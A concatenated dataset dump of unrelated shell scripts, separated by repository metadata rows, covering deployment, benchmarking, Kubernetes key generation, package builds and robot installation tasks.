rm -rf $WAR_PATH/"$PROJECT_NAME".war
rm -rf $WAR_PATH/$PROJECT_NAME
mv target/$PROJECT_NAME-1.0.0.war $WAR_PATH/"$PROJECT_NAME".war
cp $WAR_PATH/"$PROJECT_NAME".war $WAR_PATH/backup/"$PROJECT_NAME".`date +%Y%m%d%H%M%S`.war
mkdir -p $WAR_PATH/$PROJECT_NAME
mv $WAR_PATH/"$PROJECT_NAME".war $WAR_PATH/$PROJECT_NAME/
cd $WAR_PATH/$PROJECT_NAME
jar xvf "$PROJECT_NAME".war
rm -rf "$PROJECT_NAME".war
cd $SITE_PATH
jps |grep Bootstrap|awk '{print $1}'|xargs kill -9
rm -rf $SITE_PATH/${PROJECT_NAME}
rm -rf $SITE_PATH/ROOT
rm -rf $TOMCAT_PATH/work/Catalina/localhost/${PROJECT_NAME}
mv $WAR_PATH/$PROJECT_NAME/ $SITE_PATH/${PROJECT_NAME}
ln -s $SITE_PATH/${PROJECT_NAME} $SITE_PATH/ROOT
scp -rP22 /opt/app/wecash/* root@10.169.27.36:/opt/www/
sh /data/command/replace.sh
sh $TOMCAT_PATH/bin/startup.sh
tail -f $TOMCAT_PATH/logs/catalina.out
| true |
eecff26ac26907bc6cb89bc5305b8edc52494553 | Shell | hexhex/dlliteplugin | /benchmarks/scripts/testset.sh | UTF-8 | 3,846 | 3.46875 | 3 | [] | no_license | #$1 (optional) limit support set size or number by repair computation value supsize/supnum
#$2 (optional) bound on support set size (resp. number)
lim=""
if [[ $# == 2 ]] && [[ $1 != "" ]] && [[ $2!="" ]]; then
lim="--$1=$2"
echo "Testing partial support families, option $lim is enabled for repair"
fi
start=`date +%s`
loop="instances/*.hex"
# prepare instances folder
if [ -d "instances/consistent" ]; then
rm -f -r instances/consistent/*
else
mkdir -p instances/consistent
fi
rm -f instances/*.out
cmd="dlvhex2 --heuristics=monolithic --plugindir=../../../../src --liberalsafety --silent -n=1"
count=`ls -1 instances/*.hex 2>/dev/null | wc -l`
if [ $count != 0 ]; then
echo "Checking consistency of $count instance(s).."
(echo "number of instances: $count") >> test_result
for instance in $(eval "echo $loop")
do
$cmd $instance 1>$instance.anset
hexfilename="$instance"
owlstring=owl
ontofilename=$(echo $hexfilename | sed "s/hex/${owlstring}/ g" -)
asfilename=$(echo $instance.anset)
#echo "hex file: $hexfilename"
#echo "owl file: $ontofilename"
if [[ -s $instance.anset ]]; then
mv $hexfilename instances/consistent
mv $ontofilename instances/consistent
mv $asfilename instances/consistent
else
(echo "$hexfilename") >> test_result
fi
done
else
echo "There are no files in the instance directory"
fi
# all consistent instances are moved to the respective folder, and inconsistent ones are left in the instances folder
# we loop over inconsistent instances and compute repairs
incloop="instances/*.hex"
cmdrep="dlvhex2 --heuristics=monolithic --plugindir=../../../../src --supportsets --el --liberalsafety --silent -n=1 --supsize=3"
count=`ls -1 instances/*.hex 2>/dev/null | wc -l`
if [ $count != 0 ]; then
#remove anset and repinfo files from the instances directory (they all are empty)
rm -f instances/*.repinfo
rm -f instances/*.anset
#create a folder for storing repaired instances
#if [ -d "instances/repaired" ]; then
# rm -f -r instances/repaired/*
#else
# mkdir -p instances/repaired
#fi
#loop over programs in instance folder and compute repairs
echo "Repairing $count inconsistent instance(s)..."
(echo "number of inconsistent instances: $count") >> test_result
for instance in $(eval "echo $incloop")
do
hexfilename="$instance"
#echo "hex file: $hexfilename"
owlstring=owl
ontofilename=$(echo $hexfilename | sed "s/hex/${owlstring}/ g" -)
#echo "owl file: $ontofilename"
awk ' BEGIN { print "repair answer set: " } ' >>$instance.repinfo
$cmdrep $instance --repair=$ontofilename --verbose=1 2>$instance.out >>$instance.repinfo
awk ' BEGIN { print "******************" } ' >>$instance.repinfo
# check whether repair was found
cat $instance.out | grep "#RMG:" >$instance.rep
sed -i 's/\ 1 eO gM #RMG: PC: //g' $instance.rep
cat $instance.rep >> $instance.repinfo
awk ' BEGIN { print "******************" } ' >>$instance.repinfo
rm $instance.rep
#rm $instance.out
cp $ontofilename $ontofilename.orig
cat $instance.repinfo | while read line
do
template="aux_o_0_1"
if [[ "$line" =~ "$template" ]]; then
line=$(echo $line | sed s/aux_o_0_1\(\"//g)
line=$(echo $line | sed s/\"\)//g)
line=$(echo $line | sed s/\"//g)
line=$(echo $line | sed s/,/' '/g)
echo "'$line' is removed from $ontofilename";
/home/dasha/Documents/software/owl-toolkit/v\-1/owl-toolkit/dist/owl-fact-remove $line $ontofilename
fi
done
awk ' BEGIN { print "answer set of a repaired program:" } ' >>$instance.repinfo
$cmd $instance $lim >>$instance.repinfo
mv $ontofilename $ontofilename.repaired
mv $ontofilename.orig $ontofilename
done
else
echo "all instances are consistent"
fi
end=`date +%s`
runtime=$((end-start))
echo "Runtime: $runtime"
| true |
c7e211cd05a0d978000b86208fd8113823a02657 | Shell | adhytianara/SistemOperasi | /Demos/Week01/a06-loop | UTF-8 | 958 | 3.265625 | 3 | [] | no_license | #!/bin/bash
# REV07: Thu Feb 6 20:43:55 WIB 2020
# REV06: Mon Aug 27 20:07:30 WIB 2018
# START: Mon Sep 5 14:34:41 WIB 2016
# Copyright (C) 2016-2020 Rahmat M. Samik-Ibrahim
# http://RahmatM.Samik-Ibrahim.vLSM.org/
# This program is free script/software. This program is distributed in the hope
# that it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# INFO: Just run "bash a06-loop 11 22 33 44"
INFO=".zzz-generate-READ-THIS-FIRST.sh"
echo ""
[ -f $INFO ] && bash $INFO $0
echo ""
[ -z "$3" ] && { echo "Run this AGAIN with arguments. Eg. \"bash a06-loop 11 22 33 44\"" ; exit 1; }
echo "========= ========= ========= ========= ========= ========= ========= ========="
echo 'Loop with [*]'
for ii in "$*"
do
echo $ii
done
echo "========= ========= ========= ========= ========= ========= ========= ========="
echo 'Loop with [@]'
for ii in "$@"
do
echo $ii
done
exit 0
| true |
78c521be1c8245c8a5a98f84aae262e9c551e389 | Shell | rafalh/mtasa_toxic | /toxic/conf/validate.sh | UTF-8 | 228 | 3.125 | 3 | [
"MIT"
] | permissive | #!/bin/sh
set -e
for f in *.xml ; do
schema="xsd/${f%.*}.xsd"
if [ -f "$schema" ] ; then
xmllint "$schema" --noout
xmllint -schema "$schema" "$f" --noout
else
xmllint "$f" --noout
fi
done
| true |
1a1a02152f3eb19394ac67bb4cc9280728a55fc7 | Shell | wso2/pivotal-cf-is | /pattern-1/ops_update.sh | UTF-8 | 3,361 | 3.609375 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
# ----------------------------------------------------------------------------
#
# Copyright (c) 2019, WSO2 Inc. (http://www.wso2.org) All Rights Reserved.
#
# WSO2 Inc. licenses this file to you under the Apache License,
# Version 2.0 (the "License"); you may not use this file except
# in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ----------------------------------------------------------------------------
# exit immediately if a command exits with a non-zero status
set -e
usage() { echo "Usage: $0 [-b <branch name>] [-u <username>] [-p <password>]" 1>&2; exit 1; }
while getopts ":b:u:p:" o; do
case "${o}" in
b)
branch=${OPTARG}
;;
u)
username=${OPTARG}
;;
p)
password=${OPTARG}
;;
*)
usage
;;
esac
done
shift $((OPTIND-1))
if [ -z "${branch}" ] || [ -z "${username}" ] || [ -z "${password}" ]; then
usage
fi
echo "Pulling changes from branch..."
git fetch
git checkout ${branch}
# Check for changes
upstream=${1:-'@{u}'}
local=$(git rev-parse @)
remote=$(git rev-parse "$upstream")
base=$(git merge-base @ "$upstream")
if [ ${local} = ${remote} ]; then
# up-to-date
exit 0
elif [ ${local} = ${base} ]; then
git pull origin ${branch}
elif [ ${remote} = ${base} ]; then
echo "Changes made in local branch. Please revert changes and retry."
exit 1
else
echo "Local repository Diverged. Please revert changes and retry."
exit 1
fi
echo "Updating tile..."
/bin/bash update.sh
rc=$?;
if [[ ${rc} != 0 ]]; then
echo "Error occurred while updating tile. Terminating with exit code $rc"
exit ${rc};
fi
echo "Obtaining access token..."
response=$(curl -s -k -H 'Accept: application/json;charset=utf-8' -d 'grant_type=password' -d "username=$username" -d "password=$password" -u 'opsman:' https://localhost/uaa/oauth/token)
access_token=$(echo ${response} | sed -nE 's/.*"access_token":"(.*)","token.*/\1/p')
if [ -z "$access_token" ]
then
status_code=$(curl --write-out %{http_code} --output /dev/null -s -k -H 'Accept: application/json;charset=utf-8' -d 'grant_type=password' -d "username=$username" -d "password=$password" -u 'opsman:' https://localhost/uaa/oauth/token)
echo "Access token could not be obtained. Status code: $status_code"
exit 1
fi
echo "Uploading new tile..."
cd tile/product
product_dir=$(pwd)
: ${product_tile:="wso2is*.pivotal"}
# capture the exact product distribution identifiers
product_tile=$(ls ${product_tile})
tile_filepath=${product_dir}/${product_tile}
status_code=$(curl --write-out %{http_code} --output /dev/null -H "Authorization: Bearer $access_token" 'https://localhost/api/products' -F "product[file]=@$tile_filepath" -X POST -k)
if [ ${status_code} = 200 ]; then
echo "Updated tile successfully added to Ops Manager"
else
echo "Error while adding tile to Ops Manager. Status code ${status_code}"
fi
| true |
3563e7cc88adf7730c8ad5bdf25d58c7a00dd283 | Shell | project-renard-experiment/tts-experiment | /tool/festival/01_voices-mbrola | UTF-8 | 1,762 | 3.1875 | 3 | [] | no_license | #!/bin/sh
CURDIR=`dirname "$0"`
TOP="$CURDIR/../.."
WORK="$TOP/festival-data/voice/mbrola"
WORK_EXTRACT="$WORK/extract"
mkdir -p "$WORK"
mkdir -p "$WORK_EXTRACT"
echo "This downloads and unpacks the MBROLA voices"
wget -P $WORK -c \
http://tcts.fpms.ac.be/synthesis/mbrola/bin/pclinux/mbrola3.0.1h_i386.deb \
http://tcts.fpms.ac.be/synthesis/mbrola/dba/us1/us1-980512.zip \
http://tcts.fpms.ac.be/synthesis/mbrola/dba/us2/us2-980812.zip \
http://tcts.fpms.ac.be/synthesis/mbrola/dba/us3/us3-990208.zip
#http://www.festvox.org/packed/festival/latest/festvox_us1.tar.gz \
#http://www.festvox.org/packed/festival/latest/festvox_us2.tar.gz \
#http://www.festvox.org/packed/festival/latest/festvox_us3.tar.gz
for zip_file in us1-980512.zip us2-980812.zip us3-990208.zip; do
ls $WORK/$zip_file
unzip $WORK/$zip_file -d $WORK_EXTRACT
done
for tar_file in festvox_us1.tar.gz festvox_us2.tar.gz festvox_us3.tar.gz; do
tar -C $WORK_EXTRACT xzvf $WORK/$tar_file
done
#sudo dpkg -i $WORK_EXTRACT/mbrola3.0.1h_i386.deb
#sudo mkdir -p /usr/share/festival/voices/english/us1_mbrola/
#sudo mkdir -p /usr/share/festival/voices/english/us2_mbrola/
#sudo mkdir -p /usr/share/festival/voices/english/us3_mbrola/
#sudo mv $WORK_EXTRACT/us1 /usr/share/festival/voices/english/us1_mbrola/
#sudo mv $WORK_EXTRACT/us2 /usr/share/festival/voices/english/us2_mbrola/
#sudo mv $WORK_EXTRACT/us3 /usr/share/festival/voices/english/us3_mbrola/
#sudo mv $WORK_EXTRACT/festival/lib/voices/english/us1_mbrola/* /usr/share/festival/voices/english/us1_mbrola/
#sudo mv $WORK_EXTRACT/festival/lib/voices/english/us2_mbrola/* /usr/share/festival/voices/english/us2_mbrola/
#sudo mv $WORK_EXTRACT/festival/lib/voices/english/us3_mbrola/* /usr/share/festival/voices/english/us3_mbrola/
| true |
d762338703232f8b99f8ea5b40dbad4838605fe4 | Shell | Freevini/RNAseq_pipeline | /scripts/subsetting_files.sh | UTF-8 | 508 | 2.609375 | 3 | [] | no_license | ##================
##subsetting files
##================
ROOT=/home/bioinf/bioinf_data/43_sovi/Projects/Metagenomics_pipeline/Model_data/e_coli/05_trial_05
for LIB in `ls $ROOT/FASTQ | awk -F"." '{print $1}'`
do
echo "${LIB}"
less $ROOT/FASTQ/"${LIB}".fastq.gz| head -1000000 > $ROOT/FASTQ/"${LIB}".fastq
gzip $ROOT/FASTQ/"${LIB}".fastq
done
ls $ROOT/FASTQ | awk -F"." '{print $1}'
less FASTQ/SRR2135666.fastq.gz| head -1000000 > FASTQ/SRR2135666.fastq
gzip FASTQ/SRR2135666.fastq
| true |
f0b6e67b453f75f8e5e1b0ec62fd1fcfa92467af | Shell | toshi0383/xcodeproj-fixtures | /archive/SPM/bootstrap | UTF-8 | 253 | 2.921875 | 3 | [] | no_license | #!/bin/bash
set -eo pipefail
for type in empty library executable system-module
do
mkdir $type
cd $type
swift package init --type $type
grep -v xcodeproj .gitignore > a; mv a .gitignore
swift package generate-xcodeproj
cd -
done
| true |
48920037e57b28950df2b1dd84043a3b8116589d | Shell | lucaswannen/source_code_classification_with_CNN | /dataset_v2/bash/3948532.txt | UTF-8 | 256 | 3.359375 | 3 | [] | no_license | #!/bin/sh
if [ ! -d $1 ]
then echo $1 nu este director
exit1
fi
ls -R $1 >temp
permission= ls -al $1 | cut -d" " -f1
for i in `cat temp`
do
perm= ls -l $i | cut -d" " -f1
if [ $permission -ne $perm ]
then n=`expr $n + 1`
fi
echo $n
done
| true |
76b84ab5aa29d2927321e4b5252b57021d18ff4a | Shell | FayeHuang/docker-redmine | /scripts/start.sh | UTF-8 | 1,073 | 3.515625 | 4 | [] | no_license | #!/bin/bash
postgres_image=postgres:9
redmine_image=redmine:3.0.5
# 設定 redmine port
redmine_port=18888
# 設定 postgres port
postgres_port=15432
# 設定 redmine 附加檔案 data 路徑
redmine_file=/home/redmine/backup/data/files
# 設定 redmine DB 路徑
postgres_data=/home/redmine/backup/data/pg_data
# 設定 redmine 組態檔路徑
redmin_config_file=/home/redmine/backup/configuration.yml
pg_cid=$(docker run -d -p $postgres_port:5432 -v $postgres_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=redmine -e POSTGRES_USER=redmine $postgres_image)
pg_ip=$(docker inspect --format '{{ .NetworkSettings.IPAddress }}' $pg_cid)
while [[ $(sh pg_connection_test.sh $pg_ip) != "ok" ]];
do
sleep 1
echo "wait postgresql ready, wait 1s ..."
done
redmine_cid=$(docker run -d -p $redmine_port:3000 -v $redmine_file:/usr/src/redmine/files --link $pg_cid:postgres $redmine_image)
echo "$redmine_cid" > containers
echo "$pg_cid" >> containers
cat $redmin_config_file | docker exec -i $redmine_cid /bin/bash -c 'cat >'/usr/src/redmine/config/configuration.yml | true |
163457603d8b18dcd27a69d84e330c6802dbc299 | Shell | duckdb/duckdb | /tools/juliapkg/format_check.sh | UTF-8 | 318 | 3.34375 | 3 | [
"MIT"
] | permissive | set -e
if [[ $(git diff) ]]; then
echo "There are already differences prior to the format! Commit your changes prior to running format_check.sh"
exit 1
fi
./format.sh
if [[ $(git diff) ]]; then
echo "Julia format found differences:"
git diff
exit 1
else
echo "No differences found"
exit 0
fi
| true |
3168867f5bdfbf72b2b3d6414d5344b5ef6aab87 | Shell | petronny/aur3-mirror | /python2-termbox-git/PKGBUILD | UTF-8 | 912 | 2.953125 | 3 | [] | no_license | # Maintainer: Andrew Grigorev <andrew@ei-grad.ru>
pkgname=python2-termbox-git
pkgver=20131003
pkgrel=1
pkgdesc="Library that helps making Terminal-based Pseudo-GUIs (ncurses-like, but simpler)"
arch=('i686' 'x86_64')
url="http://code.google.com/p/termbox/"
license=('custom')
depends=('python2')
makedepends=('git' 'pyrex')
_gitroot='git://github.com/nsf/termbox.git'
_gitname='termbox'
build() {
cd "$srcdir"
msg "Connecting to GIT server...."
if [ -d $_gitname ] ; then
cd $_gitname && git pull origin
msg "The local files are updated."
else
git clone $_gitroot $_gitname
fi
msg "GIT checkout done or server timeout"
msg "Starting make..."
rm -rf "$srcdir/$_gitname-build"
git clone "$srcdir/$_gitname" "$srcdir/$_gitname-build"
cd "$srcdir/$_gitname-build"
python2 setup.py build
}
package() {
cd "$srcdir/$_gitname-build"
python2 setup.py install --root="$pkgdir" --optimize=1
}
| true |
2973b24d62304173c2f844132acad2c64ffac228 | Shell | agustinustheo/judgeyou | /rhetoric/apis/speechanalyzer/install-dependencies.sh | UTF-8 | 678 | 2.578125 | 3 | [] | no_license | #!/bin/bash
# ----- AUDIO EXTRACTOR -------
# Dependencies for youtube-dl download video from youtube and extract audio
sudo apt-get install ffmpeg
# ------ DEEPSPEECH -------------
# Git LFS needed for deepspeech development
# sudo add-apt-repository ppa:git-core/ppa
# curl -s https://packagecloud.io/install/repositories/github/git-lfs/script.deb.sh | sudo bash
# sudo apt-get install git-lfs
# git lfs install
# Get Dependencies
sudo apt install libsox3 libstdc++6 libgomp1 libpthread-stubs0-dev sox
# get deepspeech pretrained model
wget https://github.com/mozilla/DeepSpeech/releases/download/v0.4.1/deepspeech-0.4.1-models.tar.gz
tar xvfz deepspeech-0.4.1-models.tar.gz | true |
b1f1cd45aa11820db3de9957c160f272899356be | Shell | jiricodes/42-sudoku | /tests/scripts/test_files.sh | UTF-8 | 534 | 3.6875 | 4 | [
"MIT"
] | permissive | #! /bin/bash
# takes sudoku binary, test files input and expected folders as arguments
# assumes ex
SUDOKU=$1
BASEDIR=$(dirname "$0")
INPUTS=$2
EXPECT=$3
OUTPUTS=$BASEDIR/../outputs
OK='\033[0;32mOK\033[0m'
FAILED='\033[0;31mFAILED\033[0m'
for f in $INPUTS/*
do
fname=$(basename "$f")
args=$(cat $f)
./$SUDOKU $args > $OUTPUTS/$fname 2>&1
diff=$(diff $OUTPUTS/$fname $EXPECT/$fname)
if [ -z "$diff" ]
then
printf "%-56s $OK\n" $fname
else
printf "%-56s $FAILED\n" $fname
echo "$diff" > $OUTPUTS/${fname}_diff
fi
done | true |
01e9e9294f246d5609d6e4dc7f21cf319ddb90aa | Shell | carletes/vagrant-http-load-balancer | /provision/provision-lb.sh | UTF-8 | 204 | 2.640625 | 3 | [] | no_license | #!/bin/sh
cp /vagrant/provision/rc.conf.local /etc/
cp /vagrant/provision/relayd.conf /etc/
if [ -r /var/run/relayd.sock ] ; then
relayctl reload
else
. /etc/rc.conf.local
relayd $relayd_flags
fi
| true |
7175f57dc9ca2ee58b3e460d6eaa3e60a8e7aede | Shell | patrickmcclory/k8s-local | /setup-local.sh | UTF-8 | 4,439 | 3.453125 | 3 | [] | no_license | #!/bin/bash
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
source ${DIR}/variables.sh
echo ''
echo 'Getting CoreOS files for alpha, beta and stable releases... just in case'
echo ''
for releasename in alpha beta stable; do
echo " Downloading ${releasename} files"
sudo mkdir -p ${DIR}/tftpboot/coreos/${releasename}
sudo curl https://${releasename}.release.core-os.net/amd64-usr/current/coreos_production_pxe.vmlinuz -o ${DIR}/tftpboot/coreos/${releasename}/coreos_production_pxe.vmlinuz
sudo curl https://${releasename}.release.core-os.net/amd64-usr/current/coreos_production_pxe_image.cpio.gz -o ${DIR}/tftpboot/coreos/${releasename}/coreos_production_pxe_image.cpio.gz
done
sudo chmod -R 755 /var/lib/tftpboot/*
echo ""
echo "Done getting CoreOS files!"
echo ''
echo 'Getting core pxeboot files for pxeboot process'
echo ''
filelist=("gpxelinux.0" "ldlinux.c32" "lpxelinux.0" "memdisk" "menu.c32" "pxelinux.0")
for filename in "${filelist[@]}"; do
sudo rm -rf tftpboot/${filename}
sudo curl http://www.mcclory.io/resources/pxeboot/${filename} -o ${DIR}/tftpboot/${filename}
done
echo ""
echo "Downloading k8s binaries for kubectl"
version_ids=('v1.4.6' 'v1.4.5' 'v1.4.3')
for version_id in "${version_ids[@]}"; do
# Download k8s files
echo " Getting kubectl for version ${version_id}"
sudo mkdir -p ${DIR}/http/k8s/${version_id}
sudo wget https://storage.googleapis.com/kubernetes-release/release/${version_id}/bin/linux/amd64/kubectl -O ${DIR}/http/k8s/${version_id}/kubectl
done
echo ""
echo "Done Downloading k8s kubectl binaries"
echo ""
# Create us some keys!
# Basically following steps here: https://coreos.com/kubernetes/docs/latest/openssl.html
cd ${DIR}/http/keys
echo ""
echo "Creating Clicster Root CA"
echo ""
sudo openssl genrsa -out ca-key.pem 2048
sudo openssl req -x509 -new -nodes -key ca-key.pem -days 10000 -out ca.pem -subj "/CN=kube-ca"
echo ""
echo "Creating API Server Keypair"
echo ""
cat >> api-openssl.cnf << EOF
[req]
req_extensions = v3_req
distinguished_name = req_distinguished_name
[req_distinguished_name]
[ v3_req ]
basicConstraints = CA:FALSE
keyUsage = nonRepudiation, digitalSignature, keyEncipherment
subjectAltName = @alt_names
[alt_names]
DNS.1 = kubernetes
DNS.2 = kubernetes.default
DNS.3 = kubernetes.default.svc
DNS.4 = kubernetes.default.svc.cluster.local
DNS.5 = ${CLUSTER_DOMAIN_NAME}
IP.1 = ${K8S_SERVICE_IP}
IP.2 = ${MASTER_HOST}
EOF
sudo openssl genrsa -out apiserver-key.pem 2048
sudo openssl req -new -key apiserver-key.pem -out apiserver.csr -subj "/CN=kube-apiserver" -config api-openssl.cnf
sudo openssl x509 -req -in apiserver.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out apiserver.pem -days 10000 -extensions v3_req -extfile api-openssl.cnf
echo ""
echo "Creating Worker Keypairs"
echo ""
cat >> worker-openssl.cnf << EOF
[req]
req_extensions = v3_req
distinguished_name = req_distinguished_name
[req_distinguished_name]
[ v3_req ]
basicConstraints = CA:FALSE
keyUsage = nonRepudiation, digitalSignature, keyEncipherment
subjectAltName = @alt_names
[alt_names]
IP.1 = \$ENV::WORKER_IP
EOF
for (( i=1; i<=${NUMBER_OF_HOSTS}; i++ ))
do
FMT_DIGIT=$(printf "%02d" $i)
WORKER_FQDN=dev-${FMT_DIGIT}.${CLUSTER_DOMAIN_NAME}
WORKER_IP=172.16.16.${i}0
echo "FQDN: "${WORKER_FQDN}
echo "IP: "${WORKER_IP}
echo ""
sudo openssl genrsa -out ${WORKER_FQDN}-worker-key.pem 2048
sudo WORKER_IP=${WORKER_IP} openssl req -new -key ${WORKER_FQDN}-worker-key.pem -out ${WORKER_FQDN}-worker.csr -subj "/CN=${WORKER_FQDN}" -config worker-openssl.cnf
sudo WORKER_IP=${WORKER_IP} openssl x509 -req -in ${WORKER_FQDN}-worker.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out ${WORKER_FQDN}-worker.pem -days 10000 -extensions v3_req -extfile worker-openssl.cnf
echo ""
echo "done!"
echo ""
echo ""
done
echo "--------------------------------------------------------------------------------"
echo ""
echo "Generating Admin Key"
sudo openssl genrsa -out admin-key.pem 2048
sudo openssl req -new -key admin-key.pem -out admin.csr -subj "/CN=kube-admin"
sudo openssl x509 -req -in admin.csr -CA ca.pem -CAkey ca-key.pem -CAcreateserial -out admin.pem -days 10000
echo "Done generating Admin Key"
echo ""
sudo chmod 600 ${DIR}/http/keys/*
echo "Set up folder(s) on remote machine"
ssh ${REMOTE_MACHINE_USER}@${PXEBOOT_IP} "sudo mkdir -p /opt/k8s-local && sudo chown -R ${REMOTE_MACHINE_USER}:${REMOTE_MACHINE_USER} /opt/k8s-local"
| true |
4fd5effef024ccbadd98264c84024529d9aab15a | Shell | HumanCellAtlas/ingest-kube-deployment | /infra/helm-charts/mongo/setup.sh | UTF-8 | 903 | 2.6875 | 3 | [] | no_license | #! /usr/bin/env sh
deployment_stage=$1
s3_access_secrets=$(aws secretsmanager get-secret-value --secret-id dcp/ingest/${deployment_stage}/mongo-backup/s3-access --region=us-east-1 | jq -r .SecretString)
access_key_id=$(echo ${s3_access_secrets} | jq -jr .access_key_id | base64)
access_key_secret=$(echo ${s3_access_secrets} | jq -jr .access_key_secret| base64)
slack_alert_webhook=$(aws secretsmanager get-secret-value --secret-id dcp/ingest/${deployment_stage}/alerts --region=us-east-1 | jq -r .SecretString | jq -r .webhook_url)
helm package .
. ../../../config/environment_${deployment_stage}
helm upgrade mongo ./ --wait --install --force -f values.yaml -f environments/${deployment_stage}.yaml --set ingestbackup.secret.aws.accessKey=${access_key_id},ingestbackup.secret.aws.secretAccessKey=${access_key_secret},ingestbackup.verification.slack.webhookUrl=${slack_alert_webhook}
rm *.tgz
| true |
4bdcd6a36b5d3326544de31c5a4cfff30ca5451a | Shell | zzkoro/hombyme | /start-service.sh | UTF-8 | 640 | 3.296875 | 3 | [] | no_license | #!/usr/bin/env bash
start_cmp() {
java -jar microservices/product-composite-service/build/libs/*.jar &
}
start_prd() {
java -jar microservices/product-service/build/libs/*.jar &
}
start_rec() {
java -jar microservices/recommendation-service/build/libs/*.jar &
}
start_rev() {
java -jar microservices/review-service/build/libs/*.jar &
}
case "$1" in
cmp)
start_cmp
RET_STATUS=$?
;;
prd)
start_prd
RET_STATUS=$?
;;
rec)
start_rec
RET_STATUS=$?
;;
rev)
start_rev
RET_STATUS=$?
;;
*)
echo "Usage: start-service.sh {cmp|prd|rec|rev}" >&2
exit 1
;;
esac
exit 0
| true |
9c491d2a74b2f3948a571cd9c63b4c5f9e265310 | Shell | robocupmipt/BHumanCodeRelease | /Install/installRobot | UTF-8 | 4,921 | 4.125 | 4 | [
"BSD-2-Clause"
] | permissive | #!/bin/bash
set -eu
baseDir="$(cd "$(dirname "$(which "$0")")" && pwd)"
bhDir="$(dirname "${baseDir}")"
includeDir="${baseDir}/Include/"
source "${includeDir}/bhumanBase"
headName=""
robotVersion=""
usage() {
echo "usage:"
echo "${0} <ipaddress>"
echo ""
echo " <address> : the current dns name or ip address of the robot to install"
echo " -h|--help : displays this help"
exit 1
}
parseOptions() {
# -h or --help => print help
if [ $# -ne 1 ] ; then
if [ $# -gt 1 ] ; then
error "Too many arguments!"
fi
usage
fi
robotIp=${1}
# try to ping robot
if [ `ping ${pingoptions} ${robotIp} > /dev/null && echo 1 || echo 0` == "0" ]; then
error "robot not reachable at ${robotIp}"
usage
fi
}
getNames() {
# Test if robots.cfg exists
if [ ! -f "${robotsFile}" ]; then
fatal "The file ${robotsFile} (containing the robot names and ids) does not exist!"
fi
# get headId
local headId
headId=$(ssh -i "${privateKey}" ${sshOptions} nao@${robotIp} "cat /sys/qi/head_id 2>/dev/null || true")
if [ -z ${headId} ]; then
fatal "Failed reading the headId!"
fi
#find robotName
grepForHeadId=$(grep ${headId} "${robotsFile}")
numOfMatchingHeadIds=$(echo "${grepForHeadId}" | wc -l)
if [ ${numOfMatchingHeadIds} -eq 0 ]; then
fatal "The headId \"${headId}\" is missing (in ${robotsFile})!"
elif [ ${numOfMatchingHeadIds} -gt 1 ]; then
fatal "${robotsFile} contains the headId \"${headId}\" more than once!"
else
robotName=$(echo "${grepForHeadId}" | sed "s%.*name[ ]*=[ ]*\"\([^\"]*\).*%\1%")
if [ ${robotName} == "" ]; then
fatal "RobotName is empty"
fi
fi
robotDir="${baseDir}/Robots/${robotName}"
# does the robot exist?
if [ ! -d "${robotDir}" ]; then
fatal "Robot \"${robotName}\" does not exist"
fi
echo ""
echo "using parameters"
echo " robotName: ${robotName}"
echo " address: ${robotIp}"
echo ""
}
copyFiles() {
copyTo="/tmp/NaoInstall/${robotName}"
message "Copying files to ${copyTo}"
if [[ $(uname) == "*CYGWIN*" ]] ; then
chmod -R 755 "${fileDir}"
setfacl -s d:u::rwx,d:g::r-x,d:o:r-x "${fileDir}" #due to windows 8
chmod -R 755 "${robotDir}"
setfacl -s d:u::rwx,d:g::r-x,d:o:r-x "${robotDir}" #due to windows 8
chmod -R 755 "${baseDir}/Network/Profiles"
setfacl -s d:u::rwx,d:g::r-x,d:o:r-x "${baseDir}/Network/Profiles" #due to windows 8
fi
ssh -i "${privateKey}" ${sshOptions} nao@${robotIp} "rm -Rf ${copyTo}" || fatal "Can't remove '${copyTo}' on NAO"
ssh -i "${privateKey}" ${sshOptions} nao@${robotIp} "mkdir -p ${copyTo}" || fatal "Can't create '${copyTo}' on NAO"
rsync ${rsyncOptions} -e "${sshCommand}" "${fileDir}"/* nao@${robotIp}:${copyTo} || fatal "Can't copy to '${copyTo}' on NAO"
rsync ${rsyncOptions} -e "${sshCommand}" "${robotDir}"/* nao@${robotIp}:${copyTo}/Robot/ || fatal "Can't copy to '${copyTo}/Robot' on NAO"
rsync ${rsyncOptions} -e "${sshCommand}" "${baseDir}/Network/Profiles" nao@${robotIp}:${copyTo}/Robot/ || fatal "Can't copy to '${copyTo}/Robot' on NAO"
sysrootDir="/tmp/bhSysroot1337"
rm -Rf "${sysrootDir}"
mkdir -p "${sysrootDir}/lib"
cp "${bhDir}/Util/Buildchain/V6/gcc/lib/ld-2.29.so" "${sysrootDir}/lib/ld-linux.so.2"
cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libc-2.29.so" "${sysrootDir}/lib/libc.so.6"
cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libdl-2.29.so" "${sysrootDir}/lib/libdl.so.2"
cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libm-2.29.so" "${sysrootDir}/lib/libm.so.6"
cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libmvec-2.29.so" "${sysrootDir}/lib/libmvec.so.1"
cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libpthread-2.29.so" "${sysrootDir}/lib/libpthread.so.0"
cp "${bhDir}/Util/Buildchain/V6/gcc/lib/librt-2.29.so" "${sysrootDir}/lib/librt.so.1"
cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libstdc++.so.6.0.24" "${sysrootDir}/lib/libstdc++.so.6"
cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libgcc_s.so.1" "${sysrootDir}/lib/libgcc_s.so.1"
cp "${bhDir}/Util/Buildchain/V6/gcc/lib/libasound.so" "${sysrootDir}/lib/libasound.so.2"
